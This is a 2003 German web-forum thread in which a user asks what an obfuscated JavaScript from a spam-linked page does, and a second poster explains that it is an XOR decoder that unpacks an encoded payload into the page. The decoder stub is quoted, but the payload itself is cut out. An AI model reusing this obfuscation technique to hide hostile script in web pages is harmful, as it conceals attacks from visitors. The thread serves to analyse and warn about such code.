hilfdirselbst.ch
Facebook Twitter gamper-media
"Funktioniert nicht" ist keine hinreichende Fehlerbeschreibung.
Wolfgang Reszel  M 
Beiträge: 4170
19. Mai 2003, 15:18
Beitrag #1 von 2
Bewertung:
(445 mal gelesen)
URL zum Beitrag
Beitrag als Lesezeichen

Spam mit eigener Domain


Hi,

gerade erhielt ich folgende Mail:

------------------------------------------------
heyTeklimgb,

sagmalistdiehomepagehiervondir?

http://www.Teklimgb-online.com <<< ACHTUNG JAVASCRIPT, Wolfgang
kammiretwaskomischvor-istabersehrlustig:o))

gruss,
Michaela
-----------------------------------------------

Teklimgb schreibe ich häufig in Gästebüchern rein, also wird wohl eine Robot die Adresse gesammelt haben. Nun habe ich nicht ganz aufgepasst und die Seite gestartet. In Opera wurde nur etwas Quelltext angezeigt, deswegen ging ich in den Explorer, welcher dann eine Fehlerseite anzeigte. Nun habe ich das dumpfe Gefühl, dass die Fehlerseite absicht war und das Javascript trotzdem ausgeführt wurde. Kann mir jemand sagen was folgendes Javascript wohl bewirkt? Falls nicht, bitte ich um die Verschiebung dieses Themas in das Javascript-Forum.

Ich habe mal einige Zeichen (%20%2d etc) im Script ersetzt, damit es lesbar wird. Und sicherheitshalber den Links nicht anklicken, sondern mit Speicher unter... auf Platte ziehen.

<html>
<script language = "JavaScript">
var x = '';
x+='<script language = "JavaScript">
function d (t, k) { var y = 0;
var r = '';
t = unescape (t);
for (i = 0;
i < t.length;
i++) { x = k.charCodeAt(y);
x2 = t.charCo';
x+='deAt(i);
if (x != x2) { r = r + String.fromCharCode (x2 ^ x);
}
else { r = r + String.fromCharCode (x);
}
y++;
if (y == k.length) { y = 0;
}
}
return (e';
x+='scape (r));
}
function nqlpx3mwu26s3g (w, k) { document.write (unescape (d (w, k)));
}
var k='2288007790';
</script>
';
document.write (unescape (x));
nqlpx3mwu26s3g('%0EA%5BJY%40C%17UQ%5CUMYWU%17%0A%19%12xSNY...

<<<##<<< jetzt kommt ganz viel Kauderwelsch >>>##>>>

...%0A%1EU%5CPO%0C=2%08%19YC^X%08%3F%3A', k);

</script>
</html>


Wolfgang Top
 
X
Markus Walker  M 
Beiträge: 494
20. Mai 2003, 23:34
Beitrag #2 von 2
Beitrag ID: #36165
Bewertung:
(445 mal gelesen)
URL zum Beitrag
Beitrag als Lesezeichen

Spam mit eigener Domain


Da wurde Code verschlüsselt, welcher mit diesen Funktionen wieder entschlüsselt wird. Die Verschlüsselung ist dabei zweistufig. Die Funktion «d» erzeugt den String «r» mit dem Schlüssel «k». Den Input liefert das genannte Kauderwelsch (verschlüsselter Code).
Die ganzen «escape()» und «unescape()» wandeln Satzzeicen, Leerschläge usw. in die zugehörigen Escape-Sequenzen (% und zweistelliger Hex-Wert) hin respektive zurück.
Um an das eigentliche JavaScript zu gelangen, müsste man das Kauderwelsch gemäss dem obigen Script entschlüsseln.
als Antwort auf: [#35874] Top